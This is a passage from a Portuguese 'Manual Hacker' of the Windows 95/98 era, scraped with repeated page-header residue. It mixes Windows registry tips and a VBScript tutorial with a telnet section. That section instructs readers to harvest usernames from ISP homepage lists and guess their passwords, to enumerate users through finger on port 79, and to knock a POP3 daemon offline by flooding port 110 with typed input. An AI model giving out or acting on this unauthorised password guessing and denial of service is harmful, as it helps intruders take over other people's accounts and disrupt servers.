Internet Explorer {25336920-03F9-11CF-8FD0-00AA00686F13}

Documento MS WORD {00020900-0000-0000-C000-000000000046}

Documento MS EXCEL {00024500-0000-0000-C000-000000000046}

The MS NETWORK {00028B00-0000-0000-C000-000000000046}

FONTES. {BD84B380-8CA2-1069-A2DE-08000948F534}

--------------------------------------------------------------------------------

* DICAS RÁPIDAS PARA O SEU DIA-A-DIA *

* Menu ao iniciar o Windows 95/98Se apertar F8 após aparecer "Iniciando Windows 95/98", aparecerá o menu de início do Windows 95/98.

* Colocando Atalhos no Menu IniciarVocê pode colocar atalhos de programas mais usados na camada superior do Start Menu, bastando arrastar o atalho para o menu \windows\Start Menu. Coloque ali o Word, o Notepad, o Winzip...

Page 53: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

* Use apenas uma janela:Abrá as subpastas segurando a tecla CTRL. Para se tornar padrão, altere exibir/opções para que apenas uma janela seja usada.

* Desligue o windows "forçadamente"Se o Windows 95/98 "trava" e o CTRL-ALT-DEL não funciona, aperte CTRL-ESC. Isto deve abrir o Menu Iniciar que permitirá desligar o pc.

* Expandindo sub-pastasPara expandir todos os sub-diretórios de um diretório no Explorer, aperte a tecla "*" no teclado numérico.

* Vendo Propriedades rapidamentePara ver as propriedades de um determinado objeto, aperte a tecla ALT e dê um duplo clique nele.

* Diretório de StartupPara executar um programa sempre que iniciar o Windows, coloque um atalho dele no diretório \Windows\Menu Iniciar\Programas\Iniciar.

* Interrupções (IRQ) - como verificarAbra as propriedades de "Meu Computador", selecione "Painel de Controle" e dê duplo clique em "Sistema". Você poderá exibir IRQs, DMAs, memória e I/O. Se após selecionar "Computador" você selecionar "imprimir", você poderá imprimir um relatório sumarizado ou completo sobre o seu sistema.

* Interrupções (IRQ) - como modificarWindows 95/98 seleciona o IRQ automaticamente, mas se você quiser poderá modificá-lo manualmente selecionando as propriedades do dispositivo a ser modificado em Painel de Controle/Sistema/ e modifique o IRQ ali.

* Mostre todos os arquivos no explorer:No Explorer, selecione exibir/opções e marque mostrar todos os tipos de arquivos.

* Faça com que o Explorer mostre a extensão de todos os arquivos:No explorer, selecione exibir/opções e desmarque Ocultar extensões

Page 54: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

* Desligando a animação das janelasVocê pode desligar a animação mostrada quando você minimiza ou maximiza janelas: Abra RegEdit e selecione . HKEY_CURRENT_USER, Control panel, Desktop, WindowMetrics . Aperte o botão da direita do mouse num espaço vazio na janela da direita. . Selecione new, string value . Renomeie o novo valor para MinAnimate . Dê duplo clique em MinAnimate e entre 0 (desliga animação) ou 1 (liga) . Feche Regedit e todos os programas e reboot.

* Modifique e use o Enviar Para do ExplorerClick com o botão direito do mouse emcima de qualquer arquivo no explorer e escolha a opção 'Enviar Para'. Para adicionar outros diretórios ou programas ali, arraste-os para o folder Enviar Para (c:\windows\Enviar Para). você pode colocar o Word, Note pad ....

*Aumente a velocidade do Refresh do WindowsNormalmente é necessário apertar F5 para refrescar uma janela. Veja como isto pode ser feito automaticamente:a- Abra o RegEdit e vá ao folder HKEY_LOCAL_MACHINE e abra-ob- Abra o folder System, depois o folder CurrentControlSet. Selecione a pasta Control e depois o folder Update. Na parte direita click com o botão direito do mouse em Update. Selecione Modify e modifique o valor de 01 para 00. Clique OK. As mudanças terão efeito na próxima vez que o Windows 95/98 for iniciado.

--------------------------------------------------------------------------------

DICA especial: SE VOCÊ QUER QUE NÃO APAREÇA MAIS AQUELA TELA CHATA DO WIN95 AO INICIAR FAÇA O SEGUINTE:1- ABRA O msdos.sys no editor do msdos

2- Procure pela seção [opções]

3- Acrecente a seguinte linha a essa seção:

logo=0

4- Reinicie seu computador e então não terá aquela tela...

Lembre-se que o padrão é "Logo1" ... se quiser retornar a essa opção...

--------------------------------------------------------------------------------

Page 55: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Se você acessa a Internet, e está cansado de ser atacado por pessoas que usam NUKE, CLICK AQUI para arrumar esse bug da microsoft...

--------------------------------------------------------------------------------

Você já deve ter percebido, que quando você deixa o mouse em cima de algum ícone na desktop, aparece quase que uma janela de help amarela disendo o que aquele ícone faz. Se você deseja modificar o mini help desses ícones, faça o seguinte:

- Entre no regedit.exe-Mande, por exemplo, localizar a chave da lixeira: {645FF040-5081-101B-9F08-00AA002F954E}, após isso, você verá que do lado direiro da tela, existem dois valores, um é o Padrão e o outro é o InfoTip, dê dois clicks no InfoTip e modifique-o, depois para conferir é so ir ao desktop, deixar a lixeira selecionada e deixar o mouse sobre ela... Você pode fazer isso com todos os ícones que tem esse InFoTip, e os que não tiver, é só você criar, mandando colocar um novo valor de sequência e nomeando-o de InfoTip...

--------------------------------------------------------------------------------

RESTAURANDO O REGISTRO

TESTADO SOMENTE NO WIN95

CASO VOCÊ FAÇA ALGUMA "BESTEIRA" COM SEU REGISTRO E DANIFICÁ-LO, VOCÊ PODE RESTAURÁ-LO. PARA FAZER ISSO BASTA VOCÊ REINICIAR O COMPUTADOR, E AO APARECER O AVISO "INICIANDO O Windows 95/98..." APERTE A TECLA F8 RAPIDAMENTE, ESCOLHA SOMENTE PROMPT.

DIGITE:

CD C:\WINDOWS

DEPOIS DIGITE OS SEGUINTES COMANDOS, PRESSIONANDO ENTER DEPOIS DE CADA UM. (OBSERVE QUE SYSTEM.DA0 E USER.DA0 CONTÊM O NÚMERO ZERO.)

attrib -h -r -s system.dat

attrib -h -r -s system.da0

attrib -h -r -s user.dat

Page 56: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

attrib -h -r -s user.da0

DEPOIS REINICIE O SEU COMPUTADOR...

Page 57: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

TelNET

Bom, como você deve saber o Ataque via Telnet é um poderosos, devido os comandos que a mesma aceita e também suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere), mas também tem sua "parte mal", você geralmente "cai" dos servidores "lentos" e também demora para enviar e receber os digitos, por enquanto você digita ele demora um tempo para aparecer o que você digitou, ele nao envia palavra por palavra, mas sim caracter por caracter, por isso a demora, mas mesmo assim, ele é fundamental para quem tá querendo alguma coisa boa...Vamos ao ataque:Entre na HomePage de algum servidor através de se browser, e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo:http://www.servidor.com.br/~usuárioOnde "usuário" é o login do dono da página. Se você usa o Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. . Conecte-se ao host do servidor (Ex.: www.plisnet.com.br). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain). Apesar de ser quase impossível vc encontrar uma senha igual a um login, por isso pesquise tente coisas como data de aniversario, nome do cachorro, placa do carro e etc. Lembre-se que para se tornar um hacker vc tem que ser sutil, por isso tente se aproximar e obter informações da pessoa que vc pretende invadir.

Você deve ter entendido mais ou menos né? Bom, vamos a um breve cometário sobre a Telnet:

TELNET (Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina,como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação docomputador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais comun em servidores que permitem acesso público).O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que ocomputador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores desistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores,

Page 58: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

está muito enganado, muitas vezes ele faz a manutenção de casa mesmo, via Telnet.)Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um (procure no diretório c:\windows o programa Telnet.exe - deve estar lá).

Tutorial2

TelnetTELNET- Programa usado para conexão a outro computador , uma emulação do comando Telnet do UNIX, em que fornecendo o nome do host ou o seu IP você tenta entrar em conexão com este Host, para executar funções diversas. Este programa se encontra no diretório C:\Windows(diretório do windows). Localize o programa no diretório citado ,pois ele está para ser utilizado por aqueles que querem aprender a fazer alguns pequenos hackZ que não exigem muito conhecimento. Uma vez que você já o encontrou e o abriu em sua tela , você verá uma tela branca , e no menu superior a opção Conectar. Aí começa a sua viajem pelo Telnet. Clique em conectar , depois em Sistema Remoto. Aí você verá a tela em que está Nome do Host , porta, e tipo do terminal.Até então, há nada Hacker, é apenas um terminal.Mas uma das opções justamente aparece para mudar a história da coisa. Essa opção é a PORTA. Mas prosseguindo....Em Nome do Host ,digite o nome de uma provedora que você queira contactar.Em PORTA , vc apaga o TELNET e escreve FINGER ou 79 .Ao escrever finger, vc requesitará algumas informações interessantes os usuários,administradores do sistema,e por aí vai. Clique em OK. O que deve acontecer?¿? Há varias possibilidades, mas mais provavelmente uma dessas duas : 1-)Aparece um prompt esperando um comando qualquer... aí você pensa: Vou dar mil comandos e ser um hacker de Elite...Não! Não é por aí..normalmente o host permite apenas UM comando e depois corta a conexão, então, PENSE antes de fazer algo. 2-)Aparece a mensagem "CONEXÃO AO HOST FOI PERDIDA" (aí o computador host está bloqueando a porta 79(finger) e não adianta fazer nada, pelo menos em relação à essa porta. Em alguns hosts o fato de vc escrever root no prompt do Telnet diz a você se o administrador do sistema está "logado" ...nesse caso..GET OUT.Em outras o fato de você digitar lhe dará uma lista inteira dos usuários...fato que você pode usar para quebrar algumas senhas...ok ?? Para finalizar um exemplo prático: Abra o Telnet. Clique em conectar / Sistema Remoto . Na caixa de diálogo, em "Nome do host" ,digite : www.vitima.com(se vc não souber o que colocar no lugar de vitima.com, SE MATE LAMMER!!!) Na porta, digite 79 ou finger. Clique em OK. Aparecerá um prompt esperando uma ação sua ...se vc digitar enter irá aparecer os administradores do sistema que estão logados.Se você tentar outros comandos , pode obter coisas legais. Então você se pergunta: Pra que isso tudo ?¿? Eu respondo: Para você se familiarizar com o comando (em UNIX) Telnet...pra quando vc deixar de usar o Win95 e passar para algo de elite como o Unix , vc saberá muito o que fazer para detectar informações importantes da host que você quer hackear. Dica final: Uma IMPORTANTE coisa que vc deve ter é um PortScanner. ele te indica quais portas estão abertas no Determinado IP/Host. Isso é basicamente a chave de tudo...! A

Page 59: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

maioria dos servidores não permite acesso público via Telnet, porque essa é a principal porta de entrada de Hackers. Nestes servidores não se encontra menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer alguns comandos de Unix. Se você é Webmaster, muitas vezes vai ter acesso a provedores de presença, via FTP e, em alguns casos, Telnet, para efetuar algumas operações que o FTP não permite. Segue abaixo uma pequena lista de comandos que lhe serão muito úteis neste caso: ls -l lista os arquivos de um diretório ls -al lista todos os arquivos de um diretório, mesmo os Hidden cp x y copia o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro) mv x y move o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro) rm x deleta o arquivo x cd xxx muda o diretório ativo para xxx cd .. muda o diretório ativo para o que está 'acima' do atual mkdir xxx cria o diretório xxx dentro do diretório atual rm xxx remove o diretório xxx Ataque ao pop por telnet O que é irei explicar agora não é bem uma invasão.. é mais um metodo de você deicar provedor, servidor, oq seja bem lento... isso depende da sua vontade e paciencia .. ai vai Entre pelo telnet no host que vc quise na porta 110, ira aparecer algo parecido com isso : +OK X1 NT-POP3 Server qualquecoisa.deve.se.com.br (IMail 4.02 38-3) Quando você ver isso vc digita : Muitas palavras!!! letras, caracteres, numeros, oq vc quiser ( digite uma pagina e meia esta bom ). Depois de vc ter digitado tudo isso pegue algum livro ou qualquer coisa pesada e coloque sobre o teclado...e vai passear Depois que vc volta retire o peso e apenas click em " enter " e pronto... isto aqui vai dah uma travada legal do daemon do pop em 100% .... hehe... por enquanto eu so testei nesta porta! teste em outras!

Page 60: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

VB Script

O que é VBScript?

Um dos recursos mais interessantes do ActiveX é a disponibilidade de scripting em diversas linguagens. Desenvolvedores de aplicativo adotaram o Visual Basic com braços abertos porque era fácil de gerar aplicativos para Windows rapidamente sem se preocupar com muitos dos detalhes da programação do Windows. A Microsoft espera que, ao oferecer VBScript sob a plataforma de serviços de scripting do ActiveX impulsione o desenvolvimento na Web de forma semelhante. O VBScript lhe permite incluir lógica condicional sofisticada e processamento de evento em uma página da Web sem compilar coisa alguma. E, se você já conhece o Visual Basic, o VBScript será muito fácil. Se você nunca viu o Visual Basic, não se preocupe, pois o VBScript é semelhante a outras linguagens de programação, e você aprenderá rapidamente. O Microsoft Visual Basic Scripting Edition, o mais novo membro da família da línguagem de programação Visual Basic, traz scripting ativo para uma vasta variedade de ambientes, incluindo o scripting de cliente com o Microsoft Internet Explorer e o scripting de servidor com o Microsoft Internet Information Server.

Fácil de Usar e Aprender

Se você já programa em Visual Basic ou Visual Basic for Applications, você estará muito a vontade em desenvolver aplicações com o VBScript. Mesmo que você não saiba programar em Visual Basic, uma vez aprendido o VBScript, você estará no caminho certo para começar a programar com toda a família da linguagem Visual Basic. Embora você possa aprender VBScript neste Tutorial, programação irá requerer um estudo mais aprofundado não disponível neste Tutorial. Um bom conselho para os que desejam iniciar a programar na linguagem Visual Basic, são os livros disponíveis no mercado que trazem exemplos didáticos, ilustrativos e simples.

ActiveX & Scripting

O ActiveX Scripting oferece muito mais do que apenas uma linguagem de scripting para navegadores da Web. ActiveX é uma plataforma para desenvolvimento de qualquer quantidade de linguagens de scripting para qualquer finalidade que os desenvolvedores da Web exijam. Usando os serviços de scripting do ActiveX, uma linguagem de scripting pode ser implementada em qualquer plataforma. O ActiveX Scripting é construído a partir de dois componentes principais básicos:Hosts de Scripting do ActiveX - Os aplicativos em que um scripting é executado.

Mecanismos de Scripting do ActiveX - A linguagem em que o scripting é escrito.

O ActiveX Scripting pode ser hospedado em diversos aplicativos. O melhor exemplo de um host do ActiveX é MSIE 3.0. MSIE 3.0 aceita o VBScript. Além disso, o ActiveX Scripting oferece um ambiente para dar suporte ao scripting em

Page 61: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

servidores da Web, ferramentas de autoria da Internet ou outros aplicativos, em diversas linguagens de scripting.

VBScript em outras Aplicações e Browsers

Como um desenvolvedor, você tem licença para usar seus códigos fontes em VBScript em suas aplicações. A Microsoft fornece implementações binárias do VBScript em Windows 16-bits e 32-bits, e para o Macintosh®. VBScript é integrado com browsers da World Wide Web. VBScript e ActiveX Scripting pode também ser usuados como uma línguagem geral em outras aplicações.

Adicionando Códigos do VBScript para uma Página HTML

Você pode usar os elementos de SCRIPT, para adicionar códigos do VBScript em uma página HTML.A Tag <SCRIPT> Os código do VBScript são escritos dentro da tag <SCRIPT>. Por Exemplo, um procedimento para testar uma data de entrega pôde aparecer como se segue:<SCRIPT LANGUAGE="VBScript"><!--Function CanDeliver(Dt)CanDeliver = (CDate(Dt) - Now()) > 2End Function--></SCRIPT>Inicia e conclui com a tag <SCRIPT>. O atributo LANGUAGE indica a linguagem de scripting. Você deve especificar a línguagem porque os browsers podem usar outros tipos linguagens de scripting. Note que a função CanDeliver é embutida nas tags de comentário (<!-- e -->). Isto previne browsers que não compreende a tag <SCRIPT> de exibir o código.Você pode incluir o Script na seção HEAD da página:<HTML><HEAD><TITLE>Place Your Order</TITLE><SCRIPT LANGUAGE="VBScript"><!--Function CanDeliver(Dt)CanDeliver = (CDate(Dt) - Now()) > 2End Function--></SCRIPT></HEAD><BODY>...

Você pode usar blocos de SCRIPT em qualquer parte de uma página HTML. Você pode colocá-lo na seção BODY e ou HEAD. Entretanto, você provavelmente

Page 62: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

desejará colocar todo o código de scripting na seção HEAD, com o intuito de organizá-lo. Guardando seu código na seção HEAD você assegura que todo o código está sendo lendo e decodificado antes de qualquer chamadas da seção BODY da página HTML.Um exceção notável para esta regra é que você pode desejar fornecer código do inline scripting ao responder os eventos de objetos em seu formulário. Por Exemplo, você pode embutir código do scripting para responder a um clique no botão em um formulário:<HTML><HEAD><TITLE>Test Button Events</TITLE></HEAD><BODY><FORM NAME="Form1"><INPUT TYPE="Button" NAME="Button1" VALUE="Click"><SCRIPT FOR="Button1" EVENT="onClick" LANGUAGE="VBScript">MsgBox "Button Pressed!"</SCRIPT></FORM></BODY></HTML>

A maior parte de seu código aparecerá em procedimentos Sub ou Function, sendo executadas apenas quando forem chamadas. Entretanto, você pode escrever códigos em VBScript fora dos procedimentos, mas ainda dentro um bloco de SCRIPT. Este código é executado apenas uma vez, quando a página HTML for carregada. Isto permite a você iniciar dados ou criar um dinamismo na forma de exibir sua página, enquanto ela é carregada.

Tipos de Dados do VBScript

O que é Tipos de Dados do VBScript?O VBScript tem unicamente um tipo de dado chamado Variant. Um dado Variant é uma espécie especial de tipo de dados que pode conter espécies diferentes de informação, dependendo de como seja usado. Como Variant é o único tipo de dados do VBScript, este será também o tipo de dado retornado pelas funções do VBScript.Uma variável declarada como Variant pode conter um valor numérico, ou uma cadeia de caracter. Se você está trabalhando com dados que compare números iguais, o VBScript assume que seu tipo de dado é númerico. Parecidamente, se você estácomparando caracteres literais, o VBScript trata seus dados como string. Você pode usar números como strings simplesmente cercando-os com aspas(" ").

Subtipos Variant

Page 63: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Além do tipo numérico ou string, uma Variant podem fazer distinções sobre uma natureza específica de informação numérica. Por Exemplo, você pode ter informação numérica que representa uma data ou um tempo. Certamente, você pode também ter uma variedade rica de informação numérica, essas categorias diferentes de informação que pode ser contida em uma Variant são chamadas subtipos.A seguinte tabela mostra os subtipos de dados que uma Variant pode conter:Subtipo DescriçãoDescrição Empty (Vazio) Valor igual a 0 para variáveis numéricas ou ("") zero-comprimento para variáveis string.Null (Nulo) Variant contém intencionalmentenenhum valor válido.Boolean Contém False (falso) ou True (Verdadeiro) um ou outro.Byte Contém inteiro de 0 a 255.Integer Contém inteiro de -32,768 a 32,767.Currency 922,337,203,685,477.5808 a 922,337,203,685,477.5807.Long Contém inteiro de -2,147,483,648 a 2,147,483,647.Single 3.402823E38 a -1.401298E-45 para valores negativos; 1.401298E-45 a 3.402823E38 para valores positivos.Double Contém um duplicar-exatidão, boiado-ponto número na série 1.79769313486232E308 para4.94065645841247E-324 para valores negativos; 4.94065645841247E-324 para 1.79769313486232E308 para valores positivos.

Date (Tempo) Contém um número que representa uma data entre 1 de Janeiro de 100 até 31 de Dezembro de 9999.String Variáveis alfanuméricas, que podem ter um comprimento de 0 até aproximadamente 2 bilhões de caracteres.Object Qualquer referência de Objeto.Error Contém um número de erro.Você pode usar funções de conversão para converter dados de um subtipo para o outro. A função VarType retorna informação sobre seus dados, e armazena dentro de uma Variant.

Variáveis do VBScript

O que é uma Variável?Uma variável é um nome conveniente que se refere a uma localização de memória do computador, onde você pode armazenar informações de um programa sendo possível alterar seu valor durante o processamento. Por exemplo, você pôde cria uma variável chamada ClickCount para armazenar o número de vezes que um usuário pressionou um objeto em uma página da Web. A forma com que a variável é armazenada na memória do computador é sem importância. O que é importante é que para alterar ou atribuir um valor para essa variável você deve referenciá-la pelo seu nome. No VBScript, as variáveis são sempre tipos de dados Variant.

Page 64: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Declarando Variáveis

Você declara variáveis explicitamente em seu script usando a declaração Dim, a declaração Public, e a declaração Private. Por exemplo:Dim DegreesFahrenheitVocê pode declarar variáveis múltiplas separando-as por vírgula. Por exemplo:Dim Top, Bottom, Left, RightVocê pode também declarar uma variável implicitamente simplesmente usando seu nome no script. O que geralmente não é uma boa prática causando resultados inesperados no decorrer de seu script. Uma ótima alternativa é usar a declaração Option Explicit com a finalidade de forçar todas as declarações de variáveis. A declaração Option Explicit deve ser a primeira declaração em seu script.

Especificando Restrições

Os nomes de variáveis seguem as regras padronizadas para serem identificadas pelo VBScript.Um nome de variável deve:Ter o primeiro caracter do nome da variável sendo uma letra Não deve exceder 255 caracteres.

Escopo e Existência de Variáveis

O escopo de uma variável é determinado quando você a declara. Quando você declara uma variável dentro de um procedimento, apenas o código dentro daquele procedimento pode acessar ou muda o valor daquela variável. Isto é um escopo local e é chamado de variável a nível-procedimento. Se você declara uma variável exteriomente a um procedimento, você faz com que todos os procedimentos reconheçam aquela variável, isto é uma variável a nível-escrita.Uma variável pública é apenas destruída quando ocorre o término do script. No caso da variável privada, ou seja declarada dentro de um procedimento, sua destruição ocorre com o término da execução do procedimento. As variáveis locais são usadas para uma determinada tarefa temporária, liberando assim espaço de memória. Você pode declarar variáveis locais com o mesmo nome em vários procedimentos diferentes pois, elas são apenas visíveis no momento da execução do procedimento.

Designando Valores para Variáveis

Valores são designados para variáveis criando uma expressão do tipo: a variável encontra-se do lado esquerdo da expressão, e o valor que você deseja atribuir no lado direito. Por exemplo:B = 200Variáveis Scalar e Variáveis de ArrayEm alguns casos você apenas necessita designar um único valor para uma variável. Uma variável contendo um único valor é chamada de scalar.

Page 65: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Entretanto é conveniente designar mais de um valor relacionado apenas a uma variável. Neste caso você pode criar uma variável que contenha uma série de valores. Essa variável é chamada de array. A declaração de uma variável de array é feita dando-se um nome seguindo os parêntesis ( ). No seguinte exemplo, é declarado um array contendo 11 elementos:Dim Vetor(10)Embora o número mostrado nos parêntesis seja 10, todos os arrays no VBScript são iniciados com base zero, assim este array realmente contém 11 elementos.Você referencia cada dado de um elemento de array usando um índice. Começando com o zero e finalizando em 10, os dados podem ser atribuidos aos elementos de um array como se segue:A(0) = 256A(1) = 324A(2) = 100. . .A(10) = 55Os dados podem ser recuperados de qualquer elemento usando um índice dentro do elemento de array. Por exemplo:

. . .SomeVariable = A(8). . .

Arrays não são limitados para uma única dimensão. Você pode ter 60 dimensões, embora a maioria das pessoas não compreendem mais que três ou quatro dimensões. Dimensões múltiplas são declaradas com números relativos a sua dimensão, separados por vírgula entre parêntesis. No seguinte exemplo, a variável MyTable possui duas dimensões consistindo de 6 filas e 11 colunas:Dim MyTable(5, 10)Em um array de duas dimensões, o primeiro número será sempre o número de linhas; e o segundo número, o número de colunas.Você pode também declarar um array cujo tamanho é alterado durante o processamento do script. Este array é chamado de array dinâmico. O array é inicialmente declarado dentro de um procedimento usando a declaração Dim ou ReDim. Entretanto, para um array dinâmico, nenhum tamanho ou dimensão é colocado no interior dos parêntesis. Por exemplo:Dim MyArray()ReDim AnotherArray()

Para usar um array dinâmico, você deve subseqüentemente usar a declaração ReDim para determinar o número de dimensões e o tamanho de cada dimensão. No seguinte exemplo, ReDim atribue 25 ao tamanho inicial do array dinâmico. Com a declaração ReDim é feito um redimencionamento do array para 30, usando a palavra-chave Preserve para preservar o conteúdo do array.ReDim MyArray(25). . .ReDim Preserve MyArray(30)

Page 66: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Não há limite para o número de vezes que você pode redimensionar um array dinâmico, mas você deve saber que se o array for redimensionado com uma dimensão menor que a anterior, o conteúdo dos elementos eliminados serão perdidos.Constantes Do VBScript

O que é uma Constante?

Uma constante é um nome significativo que é recebe um valor númerico ou caracter. O VBScript define um número de constantes intrínsecas. Você pode obter informação sobre essas constantes intrínsecas na Referência da Linguagem VBScript.

Criando Constantes

Você pode criar constantes definidas pelo usuário no VBScript usando a declaração Const. Usando a declaração Const, você pode criar constantes strings ou numéricas com nomes significativos que designam seus valores literais. Por exemplo:Const MinhaString = "Isto é meu minha cadeia de caracter."Const MinhaIdade = 49Note que a string literal é cercada entre aspas ou marcas de citação (" "). As aspas são caminho óbvio para diferenciar valores de string de valores numéricos. Datas e valores do tempo são representados tendo o sinal (#) cercando o valor.Por Exemplo:Const MeuAniversario = #23-8-76#Você pode desejar adotar um esquema específico para diferenciar constantes de variáveis. Este procedimento evita durante a execução do script, ocorrer um engano e usar constantes como variáveis e vice-versa. Por exemplo, você pôde usar prefixos "vb" ou "con" nos nomes de suas constantes, ou criar sua própria nomeclatura. Diferenciando constantes de variáveis, você elimina a possibilidade de ocorrer um erro ao desenvolver scripts mais complexos.

Operadores do VBScript

O VBScript tem uma série de operadores, incluindo operadores de aritmética, operadores de comparação, operadores de concatenação, e , operadores lógicos.Precedência do OperadorQuando várias operações ocorrem em uma expressão, cada parte é avaliada e resolvida em uma ordem predeterminada chamada precedência do operador. Você pode usar parêntesis para alterar a ordem de precedência e forçar a avaliação de algumas partes de uma expressão. Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de resolução dos operadores. Dentro dos parêntesis, entretanto, a ordem de resolução dos operadores é mantida.Quando expressões contêm operadores de mais de uma categoria, os operadores aritméticos são avaliados primeiros, depois os operadores de comparação, e os

Page 67: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

operadores lógicos são avaliados por último. Todos os operadores de comparação tem precedências iguais; estes, são avaliados da esquerda-para-direita. Os operadores Lógicos e de Aritmética são avaliados na seguinte ordem.AritméticaComparaçãoLógicoDescriçãoSímboloDescriçãoSímboloDescriçãoSímboloExponenciação^Igualdade=NegaçãoLógicaNotNegação doUnary-Desigualdade<>ConjunçãoLógicaAndMultiplicação*Menor que<DisjunctionLógicoOrDivisão/Maior que>ExclusãoLógicaXorDivisão Inteira\Menor queou igual a<=Equivalencia

Page 68: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

LógicaEqvAritmética deMóduloModMaior que ouigual a>=ImplicaçãoLógicaImpAdição+Equivalenciade ObjetoIs

Subtração-